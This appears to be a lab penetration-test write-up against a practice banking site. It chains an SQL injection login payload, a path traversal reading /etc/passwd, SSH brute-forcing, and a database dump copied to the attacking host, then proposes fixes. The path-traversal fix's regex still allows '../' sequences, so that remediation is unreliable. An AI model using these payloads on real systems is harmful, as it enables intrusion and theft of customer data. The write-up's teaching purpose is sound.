Enter the corporation internal network and collect sensitive data. Explain how to fix it.
architecture-beta
group dmz(mdi:cloud-outline)[DMZ]
group priv(mdi:cloud-lock)[Private Network]
service db(mdi:database-outline)[MariaDB] in priv
service server(mdi:server-outline)[Http Server] in dmz
service internet(mdi:internet)[Internet]
service host(mdi:remote-desktop)[Attacking Host]
db:T -- B:server
internet:R -- L:server
host:R -- L:internet
When arriving on the homepage the first thing we notice is the login form. And the most logical thing to try is an SQL Injection.
The form use an email input so the navigator check before your submissions if the content fit to an email patern. By using the developer's tools we can turn this into a text input.
- login:
' or 1=1; # - password: doesn't matter
By chance while surfing on the differents pages I get access to.
I notice a GET parameter that refer to a .php file. And I wonder if I can use it to inject a system file.
http://192.168.122.104/banquignole/comptes.php?offre=epargne.php
And I want to display /etc/passwd.
So because Http server are located in /var/www/html.
We need to go back 3 times and one more time for this website especially because it's in 'banquignole' directory.
http://192.168.122.104/banquignole/comptes.php?offre=../../../../etc/passwd
I look for an user account on which SSH connection may be allowed.
So, I already have the user for the SSH connection and the IPv4 address of the web server.
If you don't know the IP address you can resolve it with:
nslookup domain-name.com
But the password still misses.
Hopefully, it can be found using the bruteforce method by running bruteforce_ssh.py that I have developped.
ssh user@web_server_ipI infiltrated the DMZ. And the company's internal network is now accessible.
I could now try to get in there too, but to steal the data stored on the mariadb server, it won't be necessary.
First of all let's see what is happening in /var/www/html/banquignole directory.
ls /var/www/html/banquignole=> I am looking for the file that initialise the DB connection.
mysql -u user -p -h mariadb_server_ipSHOW DATABASES;
exitmysqldump -u user -p -h mariadb_server_ip db_name > db_dump.sqlFrom the attacking machine:
scp user@web_server_ip: db_dump.sql .mysql -u root -p -e "CREATE DATABASE database_name;"
mysql -u root -p database_name < db_dump.sql$email = $_POST['email'];
$mdp = $_POST['password'];
$dbco->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$sql = "SELECT email, id_client, nom, prenom, passwd FROM clients WHERE email = '$email' and passwd = '$mdp'";
$sth = $dbco->prepare($sql);
$sth->execute();
$user = $sth->fetch(PDO::FETCH_ASSOC);$email = isset($_POST['email']) ? trim($_POST['email']) : '';
$mdp = isset($_POST['password']) ? $_POST['password'] : '';
$dbco->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$sql = "SELECT email, id_client, nom, prenom, passwd FROM clients WHERE email = :email and passwd = :passwd";
$sth = $dbco->prepare($sql);
$sth->bindParam(':email', $email, PDO::PARAM_STR);
$sth->bindParam(':passwd', $mdp, PDO::PARAM_STR);
$sth->execute();
$user = $sth->fetch(PDO::FETCH_ASSOC);if ( (strlen($_GET['offre']) != 0) && (isset($_GET['offre'])) ) {
$offre = $_GET['offre'];
if (file_exists($offre)) {
require_once($offre);
}
}if ( (strlen($_GET['offre']) != 0) && (isset($_GET['offre'])) ) {
$offre = $_GET['offre'];
$safeRequest = ( preg_match("/^[a-zA-Z0-9\.\-\/]+\.php$/", $offre) === 1 );
if ($safeRequest) {
if (file_exists($offre)) {
require_once($offre);
}
}
}Disable SSH Connections with passwords.
And only use connection with RSA keys with passphrase.
The mysql user which is used by the Web server to connect on the db mustn't be allowed to dump the db. (use Grant privileges...)
This feature isn't necessary on a web server and only create Security Flaw.